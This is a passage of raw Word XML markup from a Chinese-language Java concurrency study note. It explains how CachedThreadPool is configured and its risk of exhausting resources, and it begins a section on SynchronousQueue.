        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> ThreadPoolExecutor(</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>, Integer.MAX_VALUE,  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>                                      60L, TimeUnit.SECONDS,  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>                                      </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> SynchronousQueue&lt;Runnable&gt;());  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="008632FA" w:rsidRDefault="008632FA" w:rsidP="00102FF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="86"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:left w:val="single" w:sz="4" w:space="6" w:color="D1D7DC"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D1D7DC"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D1D7DC"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="225" w:lineRule="atLeast"/>
        <w:ind w:left="589"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>    }  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B0747E" w:rsidRPr="002A2126" w:rsidRDefault="008632FA" w:rsidP="008632FA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="001B2DAD" w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CachedThreadPool</w:t>
      </w:r>
      <w:r w:rsidR="001B2DAD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r w:rsidR="005B41AA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>根据需要创建新线程的线程池。</w:t>
      </w:r>
      <w:r w:rsidR="001B2DAD">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>核心线程数</w:t>
      </w:r>
      <w:r w:rsidR="001B2DAD" w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>corePoolSize</w:t>
      </w:r>
      <w:r w:rsidR="001B2DAD">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidR="001B2DAD">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="001B2DAD">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="001B2DAD">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>maximumPoolSize</w:t>
      </w:r>
      <w:r w:rsidR="001B2DAD">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的值被设置为</w:t>
      </w:r>
      <w:r w:rsidR="001B2DAD">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Intege.MAX_VALUE</w:t>
      </w:r>
      <w:r w:rsidR="001B2DAD">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00BB3766">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>线程空闲超过</w:t>
      </w:r>
      <w:r w:rsidR="00BB3766">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>60L</w:t>
      </w:r>
      <w:r w:rsidR="00BB3766">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>则将会被终止。使用没有容量的</w:t>
      </w:r>
      <w:r w:rsidR="00BB3766" w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SynchronousQueue</w:t>
      </w:r>
      <w:r w:rsidR="00BB3766">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>作为线程池的工作队列。这意味着主线程提交任务的速度高于</w:t>
      </w:r>
      <w:r w:rsidR="00BB3766" w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>maximumPoolSize</w:t>
      </w:r>
      <w:r w:rsidR="00BB3766">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中线程处理任务的速度时，</w:t>
      </w:r>
      <w:r w:rsidR="00BB3766" w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CachedThreadPool</w:t>
      </w:r>
      <w:r w:rsidR="00BB3766">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>会不断创建新线程。</w:t>
      </w:r>
      <w:r w:rsidR="003139DC" w:rsidRPr="002A2126">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>极端情况下</w:t>
      </w:r>
      <w:r w:rsidR="003139DC" w:rsidRPr="002A2126">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CachedThreadPool</w:t>
      </w:r>
      <w:r w:rsidR="006C2E1E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>会因为创建过多的线程而耗尽</w:t>
      </w:r>
      <w:r w:rsidR="003139DC" w:rsidRPr="002A2126">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidR="003139DC" w:rsidRPr="002A2126">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>和内存资源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B41AA" w:rsidRPr="005B41AA" w:rsidRDefault="005B41AA" w:rsidP="008632FA"/>
    <w:p w:rsidR="00D85546" w:rsidRDefault="00D85546" w:rsidP="00D85546">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>1.3.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> SynchronousQueue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A97B15" w:rsidRPr="00497516" w:rsidRDefault="00A97B15" w:rsidP="00497516">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Java 6</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的并发编程包中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SynchronousQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>是一个没有数据缓冲的</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，生产者线程对其的插入操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>必须等待消费者的移除操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>take</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，反过来也一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A97B15" w:rsidRPr="00497516" w:rsidRDefault="00A97B15" w:rsidP="00497516">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A97B15" w:rsidRPr="00497516" w:rsidRDefault="00A97B15" w:rsidP="00497516">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不像</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ArrayBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>LinkedListBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>SynchronousQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内部并没有数据缓存空间，你不能调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>peek()</w:t>
      </w:r>
      <w:r w:rsidRPr="00497516">
        <w:rPr>
